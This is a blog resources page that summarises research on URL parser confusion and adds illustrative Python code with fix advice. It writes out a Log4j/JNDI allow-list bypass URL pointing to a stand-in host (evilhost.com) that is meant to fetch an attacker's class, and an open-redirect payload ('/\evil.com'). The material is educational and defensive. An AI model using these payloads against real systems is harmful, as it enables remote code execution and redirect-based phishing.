Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Exploiting URL Parsing Confusion

Team82 & Snyk, posted 4 years ago
  • The authors examined the implementations of 16 URL parsers, from Python libraries such as urllib, to browsers, to cURL. One point they call out is that there are multiple revisions and definitions of what a URL is, which is the likely root of the discrepancies between parsers.
  • A URL is made up of several components: scheme://authority/path?query#fragment. Any one of these can become a security issue when two different libraries that handle the same URL disagree about where a component starts and ends.
  • The first example they give is a bypass of the local-only JNDI protection, which the author of these notes saw in VMware ESXi Server. After the initial Log4j patch, JNDI lookups were restricted to local hosts, so RCE was only possible if a non-local URL could get past that check and pull down an attacker's Java class. The URL was VERIFIED by one parser and USED by a different one, and that is the problem.
  • The URL is ldap://127.0.0.1#.evilhost.com:1389/a. The verifying parser treats everything after the # as the fragment and sees the host as 127.0.0.1, so the allow-list check passes; the parser that actually performs the lookup reads the host as 127.0.0.1#.evilhost.com, which on some platforms resolves under the attacker's evilhost.com. Discrepancies between the verifier and the code that uses the value are the root cause of many security issues!
  • 8 CVEs came out of this research. For instance, an Open Redirect was found in Flask-Security by supplying a redirect target whose scheme contained extra backslashes, which the validating parser and the browser interpreted differently.
  • Only some of these parsing bugs were fixed! If you are looking for a way to bypass URL-based protections, knowing the differences between these parsers can bear a lot of fruit. Reading this for all of the small details may pay off in the future.
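The verify-versus-use mismatch behind the JNDI bypass, and the backslash confusion behind the Flask-Security open redirect, in one runnable Python example. This is added illustration code, not the article's code nor the real JNDI, Log4j or Flask-Security implementations: `naive_ldap_host` is a constructed stand-in for a client that reads a host out of a URL without ever looking for `#`, and `browser_style` is a constructed approximation of the WHATWG rule that browsers treat `\` as `/` in http(s) URLs. The hostnames are made up.

```python
"""Added example: the same URL string read by two different parsers.

Verifier side: urllib.parse.urlsplit (RFC 3986 style, fragment starts at '#').
Use side: a naive delimiter-splitting parser constructed for this example to
model how a JNDI/LDAP-style client extracts the host (NOT the real JNDI code).
"""
from typing import Optional, Tuple
from urllib.parse import urlsplit

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def verifier_host(url: str) -> Optional[str]:
    """The VERIFY side: what an allow-list check built on urllib sees."""
    return urlsplit(url).hostname


def naive_ldap_host(url: str) -> str:
    """The USE side (constructed): strip the scheme, take everything up to the
    first '/' as the authority, then everything before the last ':' as the host.
    A '#' is just another host character to this parser."""
    rest = url.split("://", 1)[1]
    authority = rest.split("/", 1)[0]
    host, _sep, _port = authority.rpartition(":")
    return host or authority


def jndi_allowlist_check(url: str) -> dict:
    """Report what each parser thinks and whether the verifier would allow it.
    'confused' is True when the two parsers disagree on the host, i.e. the
    allow-list decision was made about a different host than the one used."""
    seen = verifier_host(url)
    used = naive_ldap_host(url)
    return {
        "verifier_host": seen,
        "used_host": used,
        "allowed": seen in LOCAL_HOSTS,
        "confused": seen != used,
    }


def browser_style(url: str) -> str:
    """Constructed approximation of browser (WHATWG) parsing for special
    schemes: a backslash is treated as a forward slash."""
    return url.replace("\\", "/")


def naive_is_relative(next_param: str) -> bool:
    """A typical 'is this a local path?' redirect check: starts with a single '/'."""
    return next_param.startswith("/") and not next_param.startswith("//")


def redirect_target_host(next_param: str) -> Tuple[str, str]:
    """(netloc the checker sees, netloc a browser would navigate to)."""
    checker_view = urlsplit(next_param).netloc
    browser_view = urlsplit(browser_style(next_param)).netloc
    return checker_view, browser_view


if __name__ == "__main__":
    # Constructed sample inputs; evilhost.com / evil.com are placeholders.
    for u in ("ldap://127.0.0.1#.evilhost.com:1389/a", "ldap://evilhost.com:1389/a"):
        print(u, "->", jndi_allowlist_check(u))
    for n in ("/dashboard", "/\\evil.com"):
        print(repr(n), "relative?", naive_is_relative(n), "hosts:", redirect_target_host(n))
```

The fix in both cases is the same: parse once, with the same parser that will consume the value, and validate the parsed components rather than the raw string. For the redirect case, comparing the netloc of the browser-normalised form against your own host catches the `/\evil.com` trick that the naive prefix check waves through.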